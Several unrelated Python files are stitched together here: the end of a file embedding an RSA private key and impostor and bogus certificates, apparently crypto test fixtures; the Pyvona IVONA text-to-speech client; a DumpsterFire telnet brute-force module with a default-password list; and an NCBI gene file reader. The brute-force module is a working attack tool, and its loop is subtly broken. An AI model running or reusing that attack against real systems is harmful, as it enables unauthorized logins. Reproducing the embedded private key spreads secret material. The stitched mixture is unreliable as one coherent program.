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
-----END RSA PRIVATE KEY-----
""")
impostorCert = load_certificate(FILETYPE_PEM, """
-----BEGIN CERTIFICATE-----
MIIE8TCCAtkCADANBgkqhkiG9w0BAQ0FADA9MRowGAYDVQQDExFDcnlwdG8gMTAx
IENsaWVudDEfMB0GCSqGSIb3DQEJARYQdXNlckBleGFtcGxlLmNvbTAiGA8yMDEz
MTIxODAwMDAwMFoYDzIwMTgxMjE4MDAwMDAwWjA9MRowGAYDVQQDExFDcnlwdG8g
MTAxIENsaWVudDEfMB0GCSqGSIb3DQEJARYQdXNlckBleGFtcGxlLmNvbTCCAiIw
DQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAL5nHJKxsgDBpQMKaerj0M9k8lDJ
WAYjWTck5XYlsN2gvNXOK2fl/iX7AKdSMG9qHZYsxFAakZzf8naqkyhXCZhdCQzL
TKF+evj80v8mMB7E1lMiGE8U4D6q/3GEkbSs1T/hIWzhcKnoOZ3HaZn4dfm4sWzW
dfcKyovOa9PpWhr1JoVZG3OOdzoMGLfyTnR/pX5AnpcmEKusW4/xzIYc8SsWT9wq
hQZywEt69llGVByv78b219hnZbwbpAZ4SAqfgZcyJAZTclpTuamiv0SCvPzbwnEF
JhCVFCZyXz6EfZNi7bo5DuPPGmS30Or4BF2/MD5wr+lMVDP1IsXnrmpCa5cWFRIU
PaJv05O+aIvuMsipfwd75iqmULltBzReFISV/OoXlt+kM1i7Li5oN4JC08SZpD1o
BjG0mWo9w1Rxe/C0KTA3oAGwq0/lAesqraHYZ9jT6ylE1PI/GBEnFu0RYjAzJ20H
COee4eRpSQvd/GLa6qY3K1XT6YYW9KwpnW953/W/FHyVbi0u3HNrbdzjrfCFONnG
yu6TwLe/rh0xtEXCa4zJEsLXkA9mvlTzlA2V6IGKKPqDYiWaVVKawW/+s8KkrQcT
gKqs/L0TqvUhXkp0mSU0GO1+gaoHhs09uyLNVOFDhU6VKd9B4ifSl1V+n6fEjY/N
qgS7fKm7bBFFFUSxAgMBAAEwDQYJKoZIhvcNAQENBQADggIBALU0ItdvHxNBJ/0f
dFVcrBxPzXrZMmXzLf8KqLVn46iDefb+NzW1yZd2ZaaPuLOSySXLXdokY0cmeUYv
04Ainl0EG4EVfV930vcg2Q0He1EJyiDTqEEozdP9e+vkjuLbrnrjCMn69FVmELhu
W1jQRaR5amcpOWXs4qhehthZWkDEBUIs5cwDNZXRFWzJq2IsT5bjy/XJYa4wiXD1
z/BWzRovOsdhZgX+YY3AhNGzyXxoKWjYh8+38Rt9bQJ9SH1ypbzx2BgYTT9hd0e1
uTi3Ss6ewQCuZqkoxcrkV0478Dxj7zUphHUl7AcbFz6vj2n1s9G0HjQDHRzYDMCj
KZ/SAbvT4G4S3pu9LPOtzmMFsTcPcZ8+njD0PrwvEXduMMSeOxpmO2a+/ARhqld1
6dS+R9YMtAvj3nInShEf8LtWTNMdzzQZrr4VVqtid2zxUeiY83L/xJCtXvbaxz5u
RpJXTDYxDZWSXNdppOydRonIAPqDOCMBrVUPPU3jNs0HtPROej1Xjh5EPI5affSc
pOUOQ1i/Og7gQtcyNtvwmgBn8yhTVZnwgS0GGTITIjJYMCnco8GgXGjhnBNp0zWv
y+UVyEjsKa5MbEyDxvIN36xACb3qG6za2S87L8DE0fwGvExD9FM7P6l5ZBAV+xd9
UvElfcF0Vk5PLLFNUTBMpoDv5GSZ
-----END CERTIFICATE-----
""")
bogusCert = load_certificate(FILETYPE_PEM, """
-----BEGIN CERTIFICATE-----
MIIE8zCCAtsCADANBgkqhkiG9w0BAQ0FADA+MRowGAYDVQQDExFDcnlwdG8gMTAx
IENsaWVudDEgMB4GCSqGSIb3DQEJARYRQk9HVVNAZXhhbXBsZS5jb20wIhgPMjAx
MzEyMTgwMDAwMDBaGA8yMDE4MTIxODAwMDAwMFowPjEaMBgGA1UEAxMRQ3J5cHRv
IDEwMSBDbGllbnQxIDAeBgkqhkiG9w0BCQEWEUJPR1VTQGV4YW1wbGUuY29tMIIC
IjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvmcckrGyAMGlAwpp6uPQz2Ty
UMlYBiNZNyTldiWw3aC81c4rZ+X+JfsAp1Iwb2odlizEUBqRnN/ydqqTKFcJmF0J
DMtMoX56+PzS/yYwHsTWUyIYTxTgPqr/cYSRtKzVP+EhbOFwqeg5ncdpmfh1+bix
bNZ19wrKi85r0+laGvUmhVkbc453OgwYt/JOdH+lfkCelyYQq6xbj/HMhhzxKxZP
3CqFBnLAS3r2WUZUHK/vxvbX2GdlvBukBnhICp+BlzIkBlNyWlO5qaK/RIK8/NvC
cQUmEJUUJnJfPoR9k2LtujkO488aZLfQ6vgEXb8wPnCv6UxUM/UixeeuakJrlxYV
EhQ9om/Tk75oi+4yyKl/B3vmKqZQuW0HNF4UhJX86heW36QzWLsuLmg3gkLTxJmk
PWgGMbSZaj3DVHF78LQpMDegAbCrT+UB6yqtodhn2NPrKUTU8j8YEScW7RFiMDMn
bQcI557h5GlJC938YtrqpjcrVdPphhb0rCmdb3nf9b8UfJVuLS7cc2tt3OOt8IU4
2cbK7pPAt7+uHTG0RcJrjMkSwteQD2a+VPOUDZXogYoo+oNiJZpVUprBb/6zwqSt
BxOAqqz8vROq9SFeSnSZJTQY7X6BqgeGzT27Is1U4UOFTpUp30HiJ9KXVX6fp8SN
j82qBLt8qbtsEUUVRLECAwEAATANBgkqhkiG9w0BAQ0FAAOCAgEAm/qYWE6sc5Ms
ZfZVXLAO/y5n7M5Fn30krZ6QEPZGrTjmPTgokyPvl+w1syQKjlSl/4ezfO8nocZK
RmgTIXv740FxtzCuXNjYvdREUH9Sf3UiDjazRoeXdUAacaKGxglfnlw2F4XlVq3G
JCUpLafPrJJWBAt47RvaK2sT0VmsgrKWCnTrAvkx9lD3sr7lazo1y6VCoYu7JQUI
g5sO+db0B7CkG4+uRgEmRSsSX9VQhRSQgXY6gE+ac1mKtjIaygyM4ndEAVoaHtI0
3+ANFh7atilQNAuJvkQS1ZypgY6SQ2Ap10zZFO4M5EUq3iSpX/8IT1D7HsbLskm1
XySFXlQ3EUiVRbgZ6Q07FUNI0+BRrk6lH3r771Xwb1dqW0k1VyI2KM95Hd7Z38Bz
v8S8XtBKMzvTNqAP6qFpUXuxjIVUPu3AxEChnOtpJ1ney7QJCpyWzuQMvgC3/Hvw
W3x1/bG+IJRg7tlBBsTYG8fefENzBpJVslTgLVHaHgnO3XrGI0EJR3B4hZ5HDzyH
XG82KXZ7uSM3RKDKsKN+UQdtUhBVrKskA3M/25ZIN8Ah+A5BO7jdh3hIA8fMPBaX
xMSAjNLyo3RjjpJMgeEs2+zqBqW4NKRB2ojeWZUA0dXgCO1nFlorAVSXNAHICKrk
zSrTx+wpRsqC46MW1cq5bvEJ7yqas/Q=
-----END CERTIFICATE-----
""")
|
|
#!/usr/bin/env python
# encoding: utf-8
"""Pyvona : an IVONA python library
Author: Zachary Bears
Contact Email: [email protected]
"""
import datetime
import hashlib
import hmac
import json
import tempfile
import contextlib
import os
import logging
from ..audio import sounds
logger = logging.getLogger(__name__)
class PyvonaException(Exception):
pass
try:
import requests
requests.packages.urllib3.disable_warnings()
except ImportError:
msg = 'The requests library is essential for Pyvona operation. '
msg += 'Without it, Pyvona will not function correctly.'
raise PyvonaException(msg)
_amazon_date_format = '%Y%m%dT%H%M%SZ'
_date_format = '%Y%m%d'
def create_voice():
"""Creates and returns a voice object to interact with
"""
return Voice()
class Voice(object):
"""An object that contains all the required methods for interacting
with the IVONA text-to-speech system
"""
voice_name = 'Agata'
language = 'pl-PL'
gender = None
speech_rate = None
sentence_break = None
paragraph_break = None
_codec = "ogg"
region_options = {
'us-east': 'us-east-1',
'us-west': 'us-west-2',
'eu-west': 'eu-west-1',
}
access_key = None
secret_key = None
algorithm = 'AWS4-HMAC-SHA256'
signed_headers = 'content-type;host;x-amz-content-sha256;x-amz-date'
_region = None
_host = None
_session = None
@property
def region(self):
return self._region
@region.setter
def region(self, region_name):
self._region = self.region_options.get(region_name, 'eu-west-1')
self._host = 'tts.{}.ivonacloud.com'.format(self._region)
@property
def codec(self):
return self._codec
@codec.setter
def codec(self, codec):
if codec not in ["mp3", "ogg"]:
raise PyvonaException(
"Invalid codec specified. Please choose 'mp3' or 'ogg'")
self._codec = codec
@contextlib.contextmanager
def use_ogg_codec(self):
current_codec = self.codec
self.codec = "ogg"
try:
yield
finally:
self.codec = current_codec
def fetch_voice_ogg(self, text_to_speak, filename):
"""Fetch an ogg file for given text and save it to the given file name
"""
with self.use_ogg_codec():
self.fetch_voice(text_to_speak, filename)
def fetch_voice(self, text_to_speak, filename):
"""Fetch a voice file for given text and save it to the given file name
"""
file_extension = ".{codec}".format(codec=self.codec)
filename += file_extension if not filename.endswith(
file_extension) else ""
with open(filename, 'wb') as f:
self.fetch_voice_fp(text_to_speak, f)
def fetch_voice_fp(self, text_to_speak, fp):
"""Fetch a voice file for given text and save it to the given file pointer
"""
r = self._send_amazon_auth_packet_v4(
'POST', 'tts', 'application/json', '/CreateSpeech', '',
self._generate_payload(text_to_speak), self._region, self._host)
if r.content.startswith(b'{'):
raise PyvonaException('Error fetching voice: {}'.format(r.content))
else:
fp.write(r.content)
def speak(self, text_to_speak, use_cache=True, async=False):
"""Speak a given text
"""
try:
text = u'' + text_to_speak
text_to_speak = text.encode('utf-8')
except Exception as e:
logger.error('Pyvona speak exception ' + str(e))
if use_cache is False:
with tempfile.NamedTemporaryFile(delete=False) as f:
with self.use_ogg_codec():
self.fetch_voice_fp(text_to_speak, f)
f.seek(0)
else:
cache_f = hashlib.md5(text_to_speak).hexdigest() + '.ogg'
if not os.path.isdir(self.speech_cache_dir):
os.makedirs(self.speech_cache_dir)
# remove the empty file
if os.path.isfile(self.speech_cache_dir + cache_f):
if not os.path.getsize(self.speech_cache_dir + cache_f) > 0:
os.remove(self.speech_cache_dir + cache_f)
if not os.path.isfile(self.speech_cache_dir + cache_f):
with self.use_ogg_codec():
self.fetch_voice(
text_to_speak, self.speech_cache_dir + cache_f)
f = self.speech_cache_dir + cache_f
sounds.play_file(f, async)
def list_voices(self):
"""Returns all the possible voices
"""
r = self._send_amazon_auth_packet_v4(
'POST', 'tts', 'application/json', '/ListVoices', '', '',
self._region, self._host)
return r.json()
def _generate_payload(self, text_to_speak):
return json.dumps({
'Input': {
"Type": "application/ssml+xml",
'Data': text_to_speak
},
'OutputFormat': {
'Codec': self.codec.upper()
},
'Parameters': {
'Rate': self.speech_rate,
'SentenceBreak': self.sentence_break,
'ParagraphBreak': self.paragraph_break
},
'Voice': {
'Name': self.voice_name,
'Language': self.language,
'Gender': self.gender
}
})
def _send_amazon_auth_packet_v4(self, method, service, content_type,
canonical_uri, canonical_querystring,
request_parameters, region, host):
"""Send a packet to a given amazon server using Amazon's signature Version 4,
Returns the resulting response object
"""
# Create date for headers and the credential string
t = datetime.datetime.utcnow()
amazon_date = t.strftime(_amazon_date_format)
date_stamp = t.strftime(_date_format)
# Step 1: Create canonical request
payload_hash = self._sha_hash(request_parameters)
canonical_headers = 'content-type:{}\n'.format(content_type)
canonical_headers += 'host:{}\n'.format(host)
canonical_headers += 'x-amz-content-sha256:{}\n'.format(payload_hash)
canonical_headers += 'x-amz-date:{}\n'.format(amazon_date)
canonical_request = '\n'.join([
method, canonical_uri, canonical_querystring, canonical_headers,
self.signed_headers, payload_hash])
# Step 2: Create the string to sign
credential_scope = '{}/{}/{}/aws4_request'.format(
date_stamp, region, service)
string_to_sign = '\n'.join([
self.algorithm, amazon_date, credential_scope,
self._sha_hash(canonical_request)])
# Step 3: Calculate the signature
signing_key = self._get_signature_key(
self.secret_key, date_stamp, region, service)
signature = hmac.new(
signing_key, string_to_sign.encode('utf-8'),
hashlib.sha256).hexdigest()
# Step 4: Create the signed packet
endpoint = 'https://{}{}'.format(host, canonical_uri)
authorization_header = '{} Credential={}/{}, ' +\
'SignedHeaders={}, Signature={}'
authorization_header = authorization_header.format(
self.algorithm, self.access_key, credential_scope,
self.signed_headers, signature)
headers = {
'Host': host,
'Content-type': content_type,
'X-Amz-Date': amazon_date,
'Authorization': authorization_header,
'x-amz-content-sha256': payload_hash,
'Content-Length': str(len(request_parameters))
}
# Send the packet and return the response
# Use requests.Session() for HTTP keep-alive
if self._session is None:
self._session = requests.Session()
return self._session.post(
endpoint, data=request_parameters, headers=headers)
def _sha_hash(self, to_hash):
return hashlib.sha256(to_hash.encode('utf-8')).hexdigest()
def _sign(self, key, msg):
return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()
def _get_signature_key(self, key, date_stamp, region_name, service_name):
k_date = self._sign(('AWS4{}'.format(key)).encode('utf-8'), date_stamp)
k_region = self._sign(k_date, region_name)
k_service = self._sign(k_region, service_name)
k_signing = self._sign(k_service, 'aws4_request')
return k_signing
def __init__(self):
"""Set initial voice object parameters
"""
from mopidy_ais_ext.config.settings import Config
config = Config.get_config()
logger.debug(str(config))
self.access_key = config['ivona_access_key']
self.secret_key = config['ivona_secret_key']
self.language = config['language']
self.voice_name = config['voice_name']
self.region = 'eu-west'
logger.debug('----------------------------------------')
logger.debug('the language is: ' + self.language + ' ----')
logger.debug('the voice is: ' + self.voice_name + ' ----')
logger.debug('----------------------------------------')
self.speech_rate = 'medium'
self.sentence_break = 400
self.paragraph_break = 650
# speech_cache_dir = os.getcwd() + '/speech_cache/'
self.speech_cache_dir = os.path.dirname(__file__) + \
os.sep + 'speech_cache' + os.sep + \
self.language + '/' + self.voice_name + '/'
# [Nicole, Enrique, Agnieszka, Tatyana, Russell,
# Lotte, Geraint, Carmen, Mads, Penelope, Jennifer,
# Brian, Eric, Ruben, Ricardo, Maxim, Giorgio, Carla,
# Naja, Maja, Astrid, Ivy, Kimberly, Chantal, Amy, Marlene,
# Ewa, Conchita, Karl, Miguel, Mathieu, Justin, Chipmunk,
# Jacek, Ines, Gwyneth, Cristiano, Celine, Jan, Liv,
# Joey, Raveena, Filiz, Dora, Salli, Vitoria, Emma, Hans, Kendra]
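# Hypothetical usage sketch (not part of the original module). Voice.__init__ reads
# IVONA credentials, language and voice name from the mopidy_ais_ext config, so a
# configured extension is assumed; the output filename below is illustrative.
#
# v = create_voice()
# v.speak('Hello from Pyvona')                    # plays a cached ogg via sounds.play_file
# v.fetch_voice_ogg('Hello again', '/tmp/hello')  # writes /tmp/hello.ogg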
|
|
#!/usr/bin/python
#
# Filename: telnet_top_100_defaults.py
#
# Version: 1.0.0
#
# Author: Joe Gervais (TryCatchHCF)
#
# Summary:
#
# Part of the DumpsterFire Toolset. See documentation at https://github.com/TryCatchHCF/DumpsterFire
#
# Description:
#
#
import os, sys, telnetlib, datetime
from FireModules.fire_module_base_class import *
class telnet_top_100_defaults( FireModule ):
def __init__(self):
self.commentsStr = "AccountBruting/telnet_top_100_defaults"
def __init__(self, moofStr):
self.moofStr = moofStr
self.commentsStr = "AccountBruting/telnet_top_100_defaults"
return;
def Description( self ):
self.Description = "Launches telnet bruteforce against target system, using common users/passwords"
return self.Description
def Configure( self ):
self.networkAddrStr = raw_input( "Enter target address (W.X.Y.Z) or domain: " )
return
def GetParameters( self ):
return( self.networkAddrStr )
def SetParameters( self, parametersStr ):
self.networkAddrStr = parametersStr
return
def ActivateLogging( self, logFlag ):
print self.commentsStr + ": Setting Logging flag!"
print logFlag
return
def Ignite( self ):
if ( self.networkAddrStr == "" ):
print "## ", self.commentsStr, ": Error - Network address string is blank"
return
else:
self.mCurrentDateTimeUTC = datetime.datetime.utcnow()
print "UTC", self.mCurrentDateTimeUTC.strftime("%x %X"), "- Attempting telnet connection to:", self.networkAddrStr
try:
# Set timeout to 3 seconds so we don't stall out
telnetSession = telnetlib.Telnet( self.networkAddrStr, 23, 3 )
print "Telnet session established to host:", self.networkAddrStr
i = 0
m = 0
# If we got a telnet session, time to bruteforce some creds
while i < len( telnetUsernames ):
while m < len( telnetPasswords ):
telnetSession.read_until( "login: " )
telnetSession.write( telnetUsernames[ i ] + "\n" )
telnetSession.read_until( "Password: " )
telnetSession.write( telnetPasswords[ m ] + "\n" )
m = m + 1
i = i + 1
except:
print "Could not establish telnet connection"
return
# Declare these lists down here so they don't clutter up the methods
telnetUsernames = [ "admin", "root", "test", "telnet" ]
telnetPasswords = [ "admin", \
"administrator", \
"root", \
"test", \
"telnet", \
"toor", \
"password", \
"password1", \
"Passw@rd", \
"000000", \
"111111", \
"123123", \
"1234", \
"12345", \
"123456", \
"1234567", \
"12345678", \
"123456789", \
"1234567890", \
"654321", \
"666666", \
"987654321", \
"abc123", \
"amanda", \
"andrea", \
"andrew", \
"angel", \
"angels", \
"anthony", \
"ashley", \
"babygirl", \
"barbie", \
"baseball", \
"basketball", \
"brandon", \
"bubbles", \
"butterfly", \
"carlos", \
"charlie", \
"chelsea", \
"chocolate", \
"computer", \
"cookie", \
"daniel", \
"danielle", \
"dev", \
"dragon", \
"elizabeth", \
"eminem", \
"family", \
"flower", \
"footbal", \
"football", \
"forever", \
"friends", \
"fuckyou", \
"hannah", \
"hello", \
"hottie", \
"iloveu", \
"iloveyou", \
"jasmine", \
"jennifer", \
"jessica", \
"jesus", \
"jonathan", \
"jordan", \
"joseph", \
"joshua", \
"junior", \
"justin", \
"letmein", \
"liverpool", \
"logon", \
"lovely", \
"loveme", \
"lovers", \
"loveyou", \
"maintaince", \
"marketing", \
"master", \
"matthew", \
"melissa", \
"michael", \
"michelle", \
"monkey", \
"mustang", \
"naruto", \
"nicole", \
"ninja", \
"playboy", \
"pretty", \
"princess", \
"purple", \
"querty", \
"qwerty", \
"raspberry", \
"robert", \
"samantha", \
"secret", \
"shadow", \
"soccer", \
"spongebob", \
"summer", \
"sunshine", \
"superman", \
"sweety", \
"teamo", \
"techsupport", \
"tigger", \
"tinkerbell", \
"trustno1", \
"tweety", \
"uploader", \
"vanessa", \
"webadmin", \
"webmaster", \
"welcome", \
"whatever" ]
|
|
"""Reads an NCBI Gene tsv file."""
from __future__ import print_function
import sys
import re
from collections import namedtuple
from collections import OrderedDict
__copyright__ = "Copyright (C) 2016-present, DV Klopfenstein, H Tang, All rights reserved."
__author__ = "DV Klopfenstein"
#pylint: disable=line-too-long,too-many-instance-attributes,unnecessary-lambda
class NCBIgeneFileReader:
"""Reads an NCBI Gene tsv file.
Generate the NCBI gene file by following these steps:
1) Open a browser at: https://www.ncbi.nlm.nih.gov/gene
2) Type search text. Example:
genetype protein coding[Properties] AND "3702"[Taxonomy ID] AND alive[property]
3) Press the "Search" button.
4) From the pull down menu: "Send to" -> File
"""
# ints=None, floats=None, hdr_ex=None, log=sys.stdout):
#def __init__(self, sep, ints, floats, hdr_ex, log):
def __init__(self, fin, sep="\t", **kwargs_dict):
self.log = kwargs_dict.get('log', sys.stdout)
self.int_hdrs = [
'tax_id', 'GeneID', 'CurrentID', # NCBI Gene
'start_position_on_the_genomic_accession', # NCBI Gene
'end_position_on_the_genomic_accession', # NCBI Gene
'exon_count', # NCBI Gene
'Start', 'start', 'End', 'end', # Cluster
'Len', 'len', 'Length', 'length', # cluster
'Qty', 'qty', '# Genes'] # Cluster
if 'ints' in kwargs_dict:
ints = kwargs_dict['ints']
if ints:
self.int_hdrs.extend(ints)
else:
self.int_hdrs = []
self.float_hdrs = ['Density', 'density', 'MinDensity'] # Cluster
# These are formatted for expected sorting: e.g. Chr "09", "10"
self.strpat_hdrs = {'Chr':'{:>2}', 'chromosome':'{:>2}'}
if 'floats' in kwargs_dict:
self.float_hdrs.extend(kwargs_dict['floats'])
self.idxs_float = [] # run() inits proper values
self.idxs_int = [] # run() inits proper values
self.idxs_strpat = [] # run() inits proper values
# Data Members used by all functions
self.fin = fin
self.hdr2idx = None
self.len = 0
self.sep = self._get_sep(fin, sep)
self.hdr_ex = kwargs_dict.get('hdr_ex', None)
# Data Members used by various functions
self.ret_list = [] # tbl2list
self.hdrs_usr = [] # tbl2sublist tbl2list
self.usr_max_idx = None
# list: Return the one item (a list of items) of interest to the user.
# sublist: Return the items (a list of lists) of interest to the user.
# lists: Return all items (a list of lists) read from the tsv/csv file.
self.fncs = {
'list': lambda fld: self.ret_list.extend([fld[hdr_i[1]] for hdr_i in self.hdrs_usr]),
'sublist': lambda fld: self.ret_list.append([fld[hdr_i[1]] for hdr_i in self.hdrs_usr]),
'lists': lambda fld: self.ret_list.append(fld)
}
def get_h2i(self, hdrs_usr):
"""Read csv/tsv file and return specified data in a list of lists."""
with open(self.fin) as fin_stream:
for line in fin_stream:
line = line.rstrip('\r\n') # chomp
if not self.hdr2idx:
if self.do_hdr(line, hdrs_usr):
return self.hdr2idx
return None
def do_hdr(self, line, hdrs_usr):
"""Initialize self.h2i."""
# If there is no header hint, consider the first line the header.
if self.hdr_ex is None:
self._init_hdr(line, hdrs_usr)
return True
# If there is a header hint, examine each beginning line until header hint is found.
if self.hdr_ex in line:
self._init_hdr(line, hdrs_usr)
return True
return False
def run(self, fnc_name, hdrs_usr):
"""Read csv/tsv file and return specified data in a list of lists."""
fnc = self.fncs[fnc_name]
with open(self.fin) as fin_stream:
for lnum, line in enumerate(fin_stream):
line = line.rstrip('\r\n') # chomp
# Obtain Data if headers have been collected from the first line
if self.hdr2idx:
self._init_data_line(fnc, lnum, line)
# Obtain the header
else:
self.do_hdr(line, hdrs_usr)
if self.log is not None:
self.log.write(" {:10,} data READ: {}\n".format(len(self.ret_list), self.fin))
return self.ret_list, self.hdr2idx
def get_nts(self):
"""Read csv/tsv file and return specified data in a list of lists."""
data = []
nt_obj = None
with open(self.fin) as fin_stream:
for lnum, line in enumerate(fin_stream, 1):
try:
line = line.rstrip('\r\n') # chomp
# Obtain Data if headers have been collected from the first line
if nt_obj is not None:
flds = re.split(self.sep, line)
self.convert_ints_floats(flds)
# Aliases
flds[6] = self._get_list(flds[6])
flds[16] = [int(s) for s in self._get_list(flds[16])]
ntdata = nt_obj._make(flds)
data.append(ntdata)
# Obtain the header
else:
nt_obj = self._init_nt_hdr(line)
                except (RuntimeError, IndexError, ValueError, TypeError):
                    # Skip lines with incomplete or malformed data, but print an error message
                    flds = re.split(self.sep, line)
                    print(len(flds), "FIELDS")
                    print(flds)
                    sys.stdout.write("**ERROR: {FIN}({LNUM}): {LINE}\n".format(
                        FIN=self.fin, LNUM=lnum, LINE=line))
if self.log is not None:
self.log.write(" {:10,} lines READ: {}\n".format(len(data), self.fin))
return data
@staticmethod
def _get_list(valstr):
"""Return a list, given a string containing a list of values"""
return [] if valstr == '' else [s.strip() for s in valstr.split(',')]
def hdr_xform(self, hdrs):
"""Transform NCBI Gene header fields into valid namedtuple fields."""
xform = []
hdrs = self.replace_nulls(hdrs)
for hdr in hdrs:
hdr = hdr.replace('.', '_')
hdr = hdr.replace(' ', '_')
hdr = hdr.replace('#', 'N')
hdr = hdr.replace('-', '_')
hdr = hdr.replace('"', '')
xform.append(hdr)
return xform
def _init_nt_hdr(self, line):
"""Convert headers into valid namedtuple fields."""
line = line.replace('.', '_')
line = line.replace(' ', '_')
line = line.replace('#', 'N')
line = line.replace('-', '_')
line = line.replace('"', '')
#line = re.sub(r"_$", r"", line)
hdrs = re.split(self.sep, line)
if '' in hdrs:
hdrs = NCBIgeneFileReader.replace_nulls(hdrs)
# Init indexes which will be converted to int or float
self.idxs_int = [idx for idx, hdr in enumerate(hdrs) if hdr in self.int_hdrs]
self.idxs_float = [idx for idx, hdr in enumerate(hdrs) if hdr in self.float_hdrs]
if hdrs[6] != 'Aliases':
raise RuntimeError('**FATAL: BAD HEADER LINE: {LINE}'.format(LINE=line))
return namedtuple('ntncbi', ' '.join(hdrs))
@staticmethod
def _get_sep(fin, sep):
"""Uses extension(.tsv, .csv) to determine separator."""
if '.tsv' in fin:
return r'\t'
if '.csv' in fin:
return r','
return sep
@staticmethod
def replace_nulls(hdrs):
"""Replace '' in hdrs."""
ret = []
idx = 0
for hdr in hdrs:
if hdr == '':
ret.append("no_hdr{}".format(idx))
else:
ret.append(hdr)
return ret
    def _init_data_line(self, fnc, lnum, line):
        """Process a data line."""
        flds = re.split(self.sep, line)
        # Lines may contain different numbers of items.
        # The line should have all columns requested by the user.
        if self.usr_max_idx < len(flds):
            self.convert_ints_floats(flds)
            fnc(flds)
        else:
            for idx_hdr_val in enumerate(zip(self.hdr2idx.keys(), flds)):
                print(idx_hdr_val)
            for hdr in self.hdrs_usr:
                print(hdr)
            print('# ITEMS ON A LINE:', len(flds))
            print('MAX USR IDX:', self.usr_max_idx)
            raise Exception("ERROR ON LINE {} IN {}".format(lnum+1, self.fin))
def convert_ints_floats(self, flds):
"""Convert strings to ints and floats, if so specified."""
for idx in self.idxs_float:
flds[idx] = float(flds[idx])
for idx in self.idxs_int:
dig = flds[idx]
            flds[idx] = int(dig) if dig.isdigit() else dig
        for idx in self.idxs_strpat:
            # hdr2idx is an OrderedDict with sequential column indexes, so the
            # item at position idx is the (header, index) pair for that column.
            hdr = list(self.hdr2idx.items())[idx][0]
pat = self.strpat_hdrs[hdr]
flds[idx] = pat.format(flds[idx])
def _init_hdr(self, line, hdrs_usr):
"""Initialize self.hdr2idx, self.len, self.idxs_float, and self.idxs_int"""
self.hdr2idx = OrderedDict([(v.strip(), i) for i, v in enumerate(re.split(self.sep, line))])
self.len = len(self.hdr2idx)
# If user is requesting specific data fields...
if hdrs_usr is not None:
# Loop through the user headers
for usr_hdr in hdrs_usr:
# If the user header is contained in the file....
if usr_hdr in self.hdr2idx:
# Add the user header and the field index to a list
self.hdrs_usr.append([usr_hdr, self.hdr2idx[usr_hdr]])
else:
raise Exception("NO COLUMN({}) FOUND:\n HDR={}\n".format(
                        usr_hdr, '\n HDR='.join(self.hdr2idx.keys())))
